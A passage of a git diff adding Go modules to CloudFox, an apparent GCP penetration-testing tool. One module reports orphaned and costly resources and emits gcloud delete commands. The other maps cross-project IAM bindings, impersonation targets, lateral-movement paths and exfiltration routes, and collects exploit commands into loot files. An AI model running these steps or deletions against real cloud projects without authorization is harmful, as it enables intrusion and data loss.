Cost: $%.2f/month\n"+ + "# Delete orphaned disk:\n"+ + "gcloud compute disks delete %s --zone=%s --project=%s\n\n", + disk.Name, + projectID, + disk.SizeGb, estCost, + disk.Name, m.extractZoneFromURL(zone), projectID, + ) + m.mu.Unlock() + } + } + } + return nil + }) + + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_COSTSECURITY_MODULE_NAME, + fmt.Sprintf("Could not enumerate disks in project %s", projectID)) + } +} + +func (m *CostSecurityModule) findOrphanedIPs(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + // Global addresses + req := computeService.Addresses.AggregatedList(projectID) + err := req.Pages(ctx, func(page *compute.AddressAggregatedList) error { + for region, addressList := range page.Items { + if addressList.Addresses == nil { + continue + } + for _, addr := range addressList.Addresses { + // Check if address is in use + if addr.Status == "RESERVED" && len(addr.Users) == 0 { + // Static IP costs ~$7.2/month when not in use + estCost := 7.2 + + orphaned := OrphanedResource{ + Name: addr.Name, + ProjectID: projectID, + ResourceType: "static-ip", + Location: m.extractRegionFromURL(region), + Status: addr.Status, + CreatedTime: addr.CreationTimestamp, + EstCostMonth: estCost, + Reason: "Static IP reserved but not attached", + } + + m.mu.Lock() + m.Orphaned = append(m.Orphaned, orphaned) + m.orphanedEstCost += estCost + m.mu.Unlock() + + m.mu.Lock() + m.LootMap["cost-security-commands"].Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# ORPHANED IP: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Address: %s | Est. 
Cost: $%.2f/month\n"+ + "# Release static IP:\n"+ + "gcloud compute addresses delete %s --region=%s --project=%s\n\n", + addr.Name, + projectID, + addr.Address, estCost, + addr.Name, m.extractRegionFromURL(region), projectID, + ) + m.mu.Unlock() + } + } + } + return nil + }) + + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_COSTSECURITY_MODULE_NAME, + fmt.Sprintf("Could not enumerate addresses in project %s", projectID)) + } +} + +func (m *CostSecurityModule) analyzeSQLInstances(ctx context.Context, projectID string, sqlService *sqladmin.Service, logger internal.Logger) { + instances, err := sqlService.Instances.List(projectID).Do() + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_COSTSECURITY_MODULE_NAME, + fmt.Sprintf("Could not enumerate SQL instances in project %s", projectID)) + return + } + + for _, instance := range instances.Items { + // Check for stopped but still provisioned instances (still incur storage costs) + if instance.State == "SUSPENDED" { + anomaly := CostAnomaly{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "cloudsql-instance", + AnomalyType: "idle", + Severity: "MEDIUM", + Details: "Cloud SQL instance is suspended but still incurs storage costs", + Location: instance.Region, + Remediation: "Consider deleting if not needed, or start if needed for operations", + } + + m.mu.Lock() + m.CostAnomalies = append(m.CostAnomalies, anomaly) + m.mu.Unlock() + } + + // Check for high-tier instances without labels + if instance.Settings != nil && strings.Contains(instance.Settings.Tier, "db-custom") { + if instance.Settings.UserLabels == nil || len(instance.Settings.UserLabels) == 0 { + anomaly := CostAnomaly{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "cloudsql-instance", + AnomalyType: "unlabeled", + Severity: "LOW", + Details: fmt.Sprintf("High-tier Cloud SQL instance (%s) has no cost allocation labels", instance.Settings.Tier), + 
Location: instance.Region, + Remediation: fmt.Sprintf("gcloud sql instances patch %s --update-labels=cost-center=UNKNOWN,owner=UNKNOWN", instance.Name), + } + + m.mu.Lock() + m.CostAnomalies = append(m.CostAnomalies, anomaly) + m.mu.Unlock() + } + } + } +} + +func (m *CostSecurityModule) analyzeStorageBuckets(ctx context.Context, projectID string, storageService *storage.Service, logger internal.Logger) { + buckets, err := storageService.Buckets.List(projectID).Do() + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_COSTSECURITY_MODULE_NAME, + fmt.Sprintf("Could not enumerate storage buckets in project %s", projectID)) + return + } + + for _, bucket := range buckets.Items { + // Check for buckets without labels + if len(bucket.Labels) == 0 { + anomaly := CostAnomaly{ + Name: bucket.Name, + ProjectID: projectID, + ResourceType: "storage-bucket", + AnomalyType: "unlabeled", + Severity: "LOW", + Details: "Storage bucket has no cost allocation labels", + Location: bucket.Location, + Remediation: fmt.Sprintf("gsutil label ch -l cost-center:UNKNOWN gs://%s", bucket.Name), + } + + m.mu.Lock() + m.CostAnomalies = append(m.CostAnomalies, anomaly) + m.mu.Unlock() + } + + // Check for multi-regional buckets with nearline/coldline (unusual pattern) + if bucket.StorageClass == "NEARLINE" || bucket.StorageClass == "COLDLINE" { + if strings.Contains(strings.ToUpper(bucket.Location), "DUAL") || len(bucket.Location) <= 4 { + anomaly := CostAnomaly{ + Name: bucket.Name, + ProjectID: projectID, + ResourceType: "storage-bucket", + AnomalyType: "suboptimal-config", + Severity: "LOW", + Details: fmt.Sprintf("Multi-regional bucket with %s storage (consider single region for cost)", bucket.StorageClass), + Location: bucket.Location, + Remediation: "Consider using single-region buckets for archival storage", + } + + m.mu.Lock() + m.CostAnomalies = append(m.CostAnomalies, anomaly) + m.mu.Unlock() + } + } + } +} + +// ------------------------------ +// 
Helper Functions +// ------------------------------ +func (m *CostSecurityModule) extractMachineTypeName(url string) string { + parts := strings.Split(url, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return url +} + +func (m *CostSecurityModule) extractZoneFromURL(url string) string { + if strings.Contains(url, "zones/") { + parts := strings.Split(url, "/") + for i, part := range parts { + if part == "zones" && i+1 < len(parts) { + return parts[i+1] + } + } + } + return url +} + +func (m *CostSecurityModule) extractRegionFromURL(url string) string { + if strings.Contains(url, "regions/") { + parts := strings.Split(url, "/") + for i, part := range parts { + if part == "regions" && i+1 < len(parts) { + return parts[i+1] + } + } + } + return url +} + +func (m *CostSecurityModule) parseMachineType(machineType string) (vcpus int64, memGB float64) { + // Common machine type patterns + // n1-standard-4: 4 vCPUs, 15 GB + // e2-medium: 2 vCPUs, 4 GB + // custom-8-32768: 8 vCPUs, 32 GB + + switch { + case strings.HasPrefix(machineType, "custom-"): + // Parse custom machine type + parts := strings.Split(machineType, "-") + if len(parts) >= 3 { + fmt.Sscanf(parts[1], "%d", &vcpus) + var memMB int64 + fmt.Sscanf(parts[2], "%d", &memMB) + memGB = float64(memMB) / 1024 + } + case strings.HasPrefix(machineType, "n1-"): + vcpuMap := map[string]int64{ + "n1-standard-1": 1, "n1-standard-2": 2, "n1-standard-4": 4, + "n1-standard-8": 8, "n1-standard-16": 16, "n1-standard-32": 32, + "n1-standard-64": 64, "n1-standard-96": 96, + "n1-highmem-2": 2, "n1-highmem-4": 4, "n1-highmem-8": 8, + "n1-highmem-16": 16, "n1-highmem-32": 32, "n1-highmem-64": 64, + "n1-highcpu-2": 2, "n1-highcpu-4": 4, "n1-highcpu-8": 8, + "n1-highcpu-16": 16, "n1-highcpu-32": 32, "n1-highcpu-64": 64, + } + vcpus = vcpuMap[machineType] + memGB = float64(vcpus) * 3.75 // Standard ratio + case strings.HasPrefix(machineType, "e2-"): + vcpuMap := map[string]int64{ + "e2-micro": 2, "e2-small": 2, 
"e2-medium": 2, + "e2-standard-2": 2, "e2-standard-4": 4, "e2-standard-8": 8, + "e2-standard-16": 16, "e2-standard-32": 32, + "e2-highmem-2": 2, "e2-highmem-4": 4, "e2-highmem-8": 8, + "e2-highmem-16": 16, + "e2-highcpu-2": 2, "e2-highcpu-4": 4, "e2-highcpu-8": 8, + "e2-highcpu-16": 16, "e2-highcpu-32": 32, + } + vcpus = vcpuMap[machineType] + memGB = float64(vcpus) * 4 // Approximate + case strings.HasPrefix(machineType, "n2-") || strings.HasPrefix(machineType, "n2d-"): + parts := strings.Split(machineType, "-") + if len(parts) >= 3 { + fmt.Sscanf(parts[2], "%d", &vcpus) + memGB = float64(vcpus) * 4 + } + case strings.HasPrefix(machineType, "c2-"): + parts := strings.Split(machineType, "-") + if len(parts) >= 3 { + fmt.Sscanf(parts[2], "%d", &vcpus) + memGB = float64(vcpus) * 4 + } + default: + vcpus = 2 + memGB = 4 + } + + return vcpus, memGB +} + +func (m *CostSecurityModule) estimateInstanceCost(machineType string, vcpus int64, memGB float64, gpuCount int) float64 { + // Rough monthly estimates based on on-demand pricing in us-central1 + // Actual costs vary by region and commitment + + baseCost := float64(vcpus)*25 + memGB*3 // Rough per-vCPU and per-GB costs + + // GPU costs (rough estimates) + if gpuCount > 0 { + baseCost += float64(gpuCount) * 400 // ~$400/month per GPU + } + + // Adjust for machine type efficiency + if strings.HasPrefix(machineType, "e2-") { + baseCost *= 0.7 // E2 is cheaper + } else if strings.HasPrefix(machineType, "c2-") { + baseCost *= 1.2 // C2 is more expensive + } + + return baseCost +} + +func (m *CostSecurityModule) estimateDiskCost(sizeGB int64, diskType string) float64 { + // Rough monthly estimates per GB + // pd-standard: $0.04/GB, pd-ssd: $0.17/GB, pd-balanced: $0.10/GB + + pricePerGB := 0.04 + if strings.Contains(diskType, "ssd") { + pricePerGB = 0.17 + } else if strings.Contains(diskType, "balanced") { + pricePerGB = 0.10 + } + + return float64(sizeGB) * pricePerGB +} + +// ------------------------------ +// Loot File 
Management +// ------------------------------ +func (m *CostSecurityModule) initializeLootFiles() { + m.LootMap["cost-security-commands"] = &internal.LootFile{ + Name: "cost-security-commands", + Contents: "# Cost Security Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *CostSecurityModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *CostSecurityModule) buildTables() []internal.TableFile { + // Main cost-security table (combines cryptomining, orphaned, and anomalies) + mainHeader := []string{ + "Project ID", + "Project Name", + "Resource", + "Type", + "Location", + "Issue", + "Est. Cost/Mo", + } + + var mainBody [][]string + + // Add cryptomining indicators + for _, c := range m.Cryptomining { + mainBody = append(mainBody, []string{ + c.ProjectID, + m.GetProjectName(c.ProjectID), + c.Name, + c.ResourceType, + c.Location, + fmt.Sprintf("cryptomining: %s", c.Indicator), + "-", + }) + } + + // Add orphaned resources + for _, o := range m.Orphaned { + mainBody = append(mainBody, []string{ + o.ProjectID, + m.GetProjectName(o.ProjectID), + o.Name, + o.ResourceType, + o.Location, + "orphaned", + fmt.Sprintf("$%.2f", o.EstCostMonth), + }) + } + + // Add cost anomalies + for _, a := range m.CostAnomalies { + mainBody = append(mainBody, []string{ + a.ProjectID, + m.GetProjectName(a.ProjectID), + a.Name, + a.ResourceType, + a.Location, + a.AnomalyType, + fmt.Sprintf("$%.2f", a.EstCostMonth), + }) + + // Add remediation to loot + if a.Remediation != "" { + m.LootMap["cost-security-commands"].Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# %s: %s\n"+ + "# 
=============================================================================\n"+ + "# Project: %s\n"+ + "# %s\n"+ + "%s\n\n", + strings.ToUpper(a.AnomalyType), a.Name, + a.ProjectID, a.Details, a.Remediation, + ) + } + } + + // Expensive Resources table (keep separate due to different structure) + expensiveHeader := []string{ + "Project ID", + "Project Name", + "Resource", + "Location", + "Machine Type", + "vCPUs", + "Memory GB", + "GPUs", + "Labeled", + "Est. Cost/Mo", + } + + var expensiveBody [][]string + for _, e := range m.Expensive { + labeled := "No" + if len(e.Labels) > 0 { + labeled = "Yes" + } + + expensiveBody = append(expensiveBody, []string{ + e.ProjectID, + m.GetProjectName(e.ProjectID), + e.Name, + e.Location, + e.MachineType, + fmt.Sprintf("%d", e.VCPUs), + fmt.Sprintf("%.1f", e.MemoryGB), + fmt.Sprintf("%d", e.GPUs), + labeled, + fmt.Sprintf("$%.2f", e.EstCostMonth), + }) + } + + // Build tables + var tables []internal.TableFile + + if len(mainBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "cost-security", + Header: mainHeader, + Body: mainBody, + }) + } + + if len(expensiveBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "cost-security-expensive", + Header: expensiveHeader, + Body: expensiveBody, + }) + } + + return tables +} + +func (m *CostSecurityModule) collectLootFiles() []internal.LootFile { + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + return lootFiles +} + +func (m *CostSecurityModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Determine org ID from hierarchy + orgID := "" + if m.Hierarchy != nil && 
len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID + } + + if orgID != "" { + // DUAL OUTPUT: Complete aggregated output at org level + tables := m.buildTables() + lootFiles := m.collectLootFiles() + outputData.OrgLevelData[orgID] = CostSecurityOutput{Table: tables, Loot: lootFiles} + + // DUAL OUTPUT: Filtered per-project output + for _, projectID := range m.ProjectIDs { + projectTables := m.buildTablesForProject(projectID) + if len(projectTables) > 0 { + outputData.ProjectLevelData[projectID] = CostSecurityOutput{Table: projectTables, Loot: nil} + } + } + } else if len(m.ProjectIDs) > 0 { + // FALLBACK: No org discovered, output complete data to first project + tables := m.buildTables() + lootFiles := m.collectLootFiles() + outputData.ProjectLevelData[m.ProjectIDs[0]] = CostSecurityOutput{Table: tables, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), GCP_COSTSECURITY_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// buildTablesForProject builds tables filtered to only include data for a specific project +func (m *CostSecurityModule) buildTablesForProject(projectID string) []internal.TableFile { + mainHeader := []string{ + "Project ID", + "Project Name", + "Resource", + "Type", + "Location", + "Issue", + "Est. 
Cost/Mo", + } + + var mainBody [][]string + + // Add cryptomining indicators for this project + for _, c := range m.Cryptomining { + if c.ProjectID != projectID { + continue + } + mainBody = append(mainBody, []string{ + c.ProjectID, + m.GetProjectName(c.ProjectID), + c.Name, + c.ResourceType, + c.Location, + fmt.Sprintf("cryptomining: %s", c.Indicator), + "-", + }) + } + + // Add orphaned resources for this project + for _, o := range m.Orphaned { + if o.ProjectID != projectID { + continue + } + mainBody = append(mainBody, []string{ + o.ProjectID, + m.GetProjectName(o.ProjectID), + o.Name, + o.ResourceType, + o.Location, + "orphaned", + fmt.Sprintf("$%.2f", o.EstCostMonth), + }) + } + + // Add cost anomalies for this project + for _, a := range m.CostAnomalies { + if a.ProjectID != projectID { + continue + } + mainBody = append(mainBody, []string{ + a.ProjectID, + m.GetProjectName(a.ProjectID), + a.Name, + a.ResourceType, + a.Location, + a.AnomalyType, + fmt.Sprintf("$%.2f", a.EstCostMonth), + }) + } + + // Expensive Resources for this project + expensiveHeader := []string{ + "Project ID", + "Project Name", + "Resource", + "Location", + "Machine Type", + "vCPUs", + "Memory GB", + "GPUs", + "Labeled", + "Est. 
Cost/Mo", + } + + var expensiveBody [][]string + for _, e := range m.Expensive { + if e.ProjectID != projectID { + continue + } + labeled := "No" + if len(e.Labels) > 0 { + labeled = "Yes" + } + expensiveBody = append(expensiveBody, []string{ + e.ProjectID, + m.GetProjectName(e.ProjectID), + e.Name, + e.Location, + e.MachineType, + fmt.Sprintf("%d", e.VCPUs), + fmt.Sprintf("%.1f", e.MemoryGB), + fmt.Sprintf("%d", e.GPUs), + labeled, + fmt.Sprintf("$%.2f", e.EstCostMonth), + }) + } + + // Build tables + var tables []internal.TableFile + + if len(mainBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "cost-security", + Header: mainHeader, + Body: mainBody, + }) + } + + if len(expensiveBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "expensive-resources", + Header: expensiveHeader, + Body: expensiveBody, + }) + } + + return tables +} + +func (m *CostSecurityModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + tables := m.buildTables() + lootFiles := m.collectLootFiles() + + output := CostSecurityOutput{ + Table: tables, + Loot: lootFiles, + } + + // Build scope names with project names + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_COSTSECURITY_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/crossproject.go b/gcp/commands/crossproject.go new file mode 100644 index 00000000..d0fd1e62 --- /dev/null +++ b/gcp/commands/crossproject.go @@ -0,0 +1,662 @@ +package commands + +import ( + "context" + "fmt" + "strings" + + crossprojectservice "github.com/BishopFox/cloudfox/gcp/services/crossProjectService" + 
"github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPCrossProjectCommand = &cobra.Command{ + Use: globals.GCP_CROSSPROJECT_MODULE_NAME, + Aliases: []string{"cross-project", "xproject"}, + Short: "Analyze cross-project access patterns for lateral movement", + Long: `Analyze cross-project access patterns to identify lateral movement paths and data flows. + +This module is designed for penetration testing and identifies: +- Service accounts with access to multiple projects +- Cross-project IAM role bindings +- Potential lateral movement paths between projects +- Cross-project logging sinks (data exfiltration via logs) +- Cross-project Pub/Sub exports (data exfiltration via messages) +- Impersonation targets (which SAs can be impersonated in target projects) + +Features: +- Maps cross-project service account access +- Identifies cross-project roles (owner, editor, admin) +- Discovers logging sinks sending logs to other projects +- Discovers Pub/Sub subscriptions exporting to other projects (BQ, GCS, push) +- Generates exploitation commands for lateral movement +- Highlights service accounts spanning trust boundaries +- Shows impersonation targets (run foxmapper first for attack path analysis) + +RECOMMENDED: For comprehensive cross-project analysis, use -A to analyze all accessible projects: + + cloudfox gcp crossproject -A + +This will: +- Use cached org/folder/project data (auto-populated, refreshes every 24h) +- Analyze cross-project patterns across all accessible projects +- Show "Trust Boundary" column indicating if target is Internal, External, or Unknown + +TRUST BOUNDARY COLUMN: +- "Internal" - Target project is within your organization +- "External" - Target project is outside your organization (trust boundary crossing!) 
+- "Unknown" - Cannot determine boundary + +ALTERNATIVE: Specify projects manually with -l for a project list file: + + cloudfox gcp crossproject -l projects.txt + +TIP: Run foxmapper first to populate the Attack Paths column. + +WARNING: Requires multiple projects to be specified for effective analysis. +Single project analysis (-p) will have limited results.`, + Run: runGCPCrossProjectCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type CrossProjectModule struct { + gcpinternal.BaseGCPModule + + CrossBindings []crossprojectservice.CrossProjectBinding + CrossProjectSAs []crossprojectservice.CrossProjectServiceAccount + LateralMovementPaths []crossprojectservice.LateralMovementPath + CrossProjectSinks []crossprojectservice.CrossProjectLoggingSink + CrossProjectPubSub []crossprojectservice.CrossProjectPubSubExport + LootMap map[string]*internal.LootFile + FoxMapperCache *gcpinternal.FoxMapperCache + OrgCache *gcpinternal.OrgCache +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type CrossProjectOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o CrossProjectOutput) TableFiles() []internal.TableFile { return o.Table } +func (o CrossProjectOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPCrossProjectCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_CROSSPROJECT_MODULE_NAME) + if err != nil { + return + } + + if len(cmdCtx.ProjectIDs) < 2 { + cmdCtx.Logger.InfoM("Cross-project analysis works best with multiple projects. 
Consider using -l to specify a project list.", globals.GCP_CROSSPROJECT_MODULE_NAME) + } + + module := &CrossProjectModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + CrossBindings: []crossprojectservice.CrossProjectBinding{}, + CrossProjectSAs: []crossprojectservice.CrossProjectServiceAccount{}, + LateralMovementPaths: []crossprojectservice.LateralMovementPath{}, + CrossProjectSinks: []crossprojectservice.CrossProjectLoggingSink{}, + CrossProjectPubSub: []crossprojectservice.CrossProjectPubSubExport{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *CrossProjectModule) Execute(ctx context.Context, logger internal.Logger) { + // Get FoxMapper cache for graph-based analysis + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Using FoxMapper graph data for attack path analysis", globals.GCP_CROSSPROJECT_MODULE_NAME) + } + + // Get org cache from context (auto-loaded at startup) + m.OrgCache = gcpinternal.GetOrgCacheFromContext(ctx) + + // If no context cache, try loading from disk cache + if m.OrgCache == nil || !m.OrgCache.IsPopulated() { + diskCache, _, err := gcpinternal.LoadOrgCacheFromFile(m.OutputDirectory, m.Account) + if err == nil && diskCache != nil && diskCache.IsPopulated() { + m.OrgCache = diskCache + } + } + + logger.InfoM(fmt.Sprintf("Analyzing cross-project access patterns across %d project(s)...", len(m.ProjectIDs)), globals.GCP_CROSSPROJECT_MODULE_NAME) + + svc := crossprojectservice.New() + + // Analyze cross-project bindings + bindings, err := svc.AnalyzeCrossProjectAccess(m.ProjectIDs, m.OrgCache) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CROSSPROJECT_MODULE_NAME, + "Could not analyze cross-project 
access") + } else { + m.CrossBindings = bindings + } + + // Get cross-project service accounts + sas, err := svc.GetCrossProjectServiceAccounts(m.ProjectIDs) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CROSSPROJECT_MODULE_NAME, + "Could not get cross-project service accounts") + } else { + m.CrossProjectSAs = sas + } + + // Find lateral movement paths + paths, err := svc.FindLateralMovementPaths(m.ProjectIDs, m.OrgCache) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CROSSPROJECT_MODULE_NAME, + "Could not find lateral movement paths") + } else { + m.LateralMovementPaths = paths + } + + // Find cross-project logging sinks + sinks, err := svc.FindCrossProjectLoggingSinks(m.ProjectIDs) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CROSSPROJECT_MODULE_NAME, + "Could not find cross-project logging sinks") + } else { + m.CrossProjectSinks = sinks + } + + // Find cross-project Pub/Sub exports + pubsubExports, err := svc.FindCrossProjectPubSubExports(m.ProjectIDs) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CROSSPROJECT_MODULE_NAME, + "Could not find cross-project Pub/Sub exports") + } else { + m.CrossProjectPubSub = pubsubExports + } + + if len(m.CrossBindings) == 0 && len(m.CrossProjectSAs) == 0 && len(m.LateralMovementPaths) == 0 && + len(m.CrossProjectSinks) == 0 && len(m.CrossProjectPubSub) == 0 { + logger.InfoM("No cross-project access patterns found", globals.GCP_CROSSPROJECT_MODULE_NAME) + return + } + + // Add findings to loot + for _, binding := range m.CrossBindings { + m.addBindingToLoot(binding) + } + + for _, sa := range m.CrossProjectSAs { + m.addServiceAccountToLoot(sa) + } + + for _, path := range m.LateralMovementPaths { + m.addLateralMovementToLoot(path) + } + + for _, sink := range m.CrossProjectSinks { + m.addLoggingSinkToLoot(sink) + } + + 
for _, export := range m.CrossProjectPubSub { + m.addPubSubExportToLoot(export) + } + + logger.SuccessM(fmt.Sprintf("Found %d binding(s), %d SA(s), %d lateral path(s), %d logging sink(s), %d pubsub export(s)", + len(m.CrossBindings), len(m.CrossProjectSAs), len(m.LateralMovementPaths), + len(m.CrossProjectSinks), len(m.CrossProjectPubSub)), globals.GCP_CROSSPROJECT_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *CrossProjectModule) initializeLootFiles() { + m.LootMap["crossproject-commands"] = &internal.LootFile{ + Name: "crossproject-commands", + Contents: "# Cross-Project Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *CrossProjectModule) addBindingToLoot(binding crossprojectservice.CrossProjectBinding) { + // Only add if there are exploitation commands + if len(binding.ExploitCommands) > 0 { + m.LootMap["crossproject-commands"].Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# %s -> %s (%s)\n"+ + "# =============================================================================\n", + m.GetProjectName(binding.SourceProject), + m.GetProjectName(binding.TargetProject), + cleanRole(binding.Role), + ) + m.LootMap["crossproject-commands"].Contents += "\n# === EXPLOIT COMMANDS ===\n\n" + for _, cmd := range binding.ExploitCommands { + m.LootMap["crossproject-commands"].Contents += cmd + "\n" + } + m.LootMap["crossproject-commands"].Contents += "\n" + } +} + +func (m *CrossProjectModule) addServiceAccountToLoot(sa crossprojectservice.CrossProjectServiceAccount) { + // Skip - service account cross-project access is covered by bindings and lateral movement paths + // Adding separate impersonation commands would be redundant +} + +func (m *CrossProjectModule) addLateralMovementToLoot(path crossprojectservice.LateralMovementPath) { + // Only add if 
there are exploitation commands + if len(path.ExploitCommands) > 0 { + // Clean up role names for display + var cleanedRoles []string + for _, r := range path.TargetRoles { + cleanedRoles = append(cleanedRoles, cleanRole(r)) + } + + m.LootMap["crossproject-commands"].Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# %s -> %s (%s)\n"+ + "# =============================================================================\n", + m.GetProjectName(path.SourceProject), + m.GetProjectName(path.TargetProject), + strings.Join(cleanedRoles, ", "), + ) + m.LootMap["crossproject-commands"].Contents += "\n# === EXPLOIT COMMANDS ===\n\n" + for _, cmd := range path.ExploitCommands { + m.LootMap["crossproject-commands"].Contents += cmd + "\n" + } + m.LootMap["crossproject-commands"].Contents += "\n" + } +} + +func (m *CrossProjectModule) addLoggingSinkToLoot(sink crossprojectservice.CrossProjectLoggingSink) { + // Logging sinks are data exports, not direct exploitation paths + // Skip adding to loot - the table output is sufficient +} + +func (m *CrossProjectModule) addPubSubExportToLoot(export crossprojectservice.CrossProjectPubSubExport) { + // Pub/Sub exports are data exports, not direct exploitation paths + // Skip adding to loot - the table output is sufficient +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *CrossProjectModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *CrossProjectModule) getHeader() []string { + return []string{ + "Source Project", + "Source Type", + "Source Principal", + "Binding Type", + "Target Project", + "Target Type", + "Target Principal", + "Target Role", + "Attack Path", + "Trust Boundary", + } +} + +// getTargetProjectScope returns the scope of the target project 
relative to the org +func (m *CrossProjectModule) getTargetProjectScope(targetProjectID string) string { + if m.OrgCache == nil || !m.OrgCache.IsPopulated() { + return "Unknown" + } + return m.OrgCache.GetProjectScope(targetProjectID) +} + +// getImpersonationTarget checks if a role grants impersonation capabilities and returns the target +// Returns (targetType, targetPrincipal) - both "-" if no impersonation target found +func (m *CrossProjectModule) getImpersonationTarget(principal, role, targetProject string) (string, string) { + // Roles that grant impersonation capabilities + impersonationRoles := map[string]bool{ + "roles/iam.serviceAccountTokenCreator": true, + "roles/iam.serviceAccountKeyAdmin": true, + "iam.serviceAccountTokenCreator": true, + "iam.serviceAccountKeyAdmin": true, + } + + cleanedRole := cleanRole(role) + + // Check if this is an impersonation role + if !impersonationRoles[role] && !impersonationRoles[cleanedRole] && + !strings.Contains(cleanedRole, "serviceAccountTokenCreator") && + !strings.Contains(cleanedRole, "serviceAccountKeyAdmin") { + return "-", "-" + } + + // FoxMapper handles impersonation differently via graph edges + // Since we no longer use AttackPathCache, we rely on FoxMapper or show a generic message + + // No specific targets found in cache - this likely means the role was granted at the + // project level (not on specific SAs), which means ALL SAs in the target project can be impersonated + return "Service Account", fmt.Sprintf("All SAs in %s", m.GetProjectName(targetProject)) +} + +// getPrincipalTypeDisplay returns a human-readable type for the principal +func getPrincipalTypeDisplay(principal string) string { + if strings.HasPrefix(principal, "serviceAccount:") { + return "Service Account" + } else if strings.HasPrefix(principal, "user:") { + return "User" + } else if strings.HasPrefix(principal, "group:") { + return "Group" + } else if strings.HasPrefix(principal, "domain:") { + return "Domain" + } + return "Unknown" 
+} + +// cleanPrincipal removes common prefixes from principal strings for cleaner display +func cleanPrincipal(principal string) string { + // Remove serviceAccount:, user:, group: prefixes + principal = strings.TrimPrefix(principal, "serviceAccount:") + principal = strings.TrimPrefix(principal, "user:") + principal = strings.TrimPrefix(principal, "group:") + principal = strings.TrimPrefix(principal, "domain:") + return principal +} + +// cleanRole extracts just the role name from a full role path +func cleanRole(role string) string { + // Handle full project paths like "projects/project-id/roles/customRole" + if strings.Contains(role, "/roles/") { + parts := strings.Split(role, "/roles/") + if len(parts) == 2 { + return parts[1] + } + } + // Handle standard roles like "roles/compute.admin" + if strings.HasPrefix(role, "roles/") { + return strings.TrimPrefix(role, "roles/") + } + return role +} + +// extractCrossProjectResourceName extracts just the resource name from a full resource path +func extractCrossProjectResourceName(path string) string { + // Handle various path formats + parts := strings.Split(path, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return path +} + +// getAttackPathForTarget returns attack path summary for a principal accessing 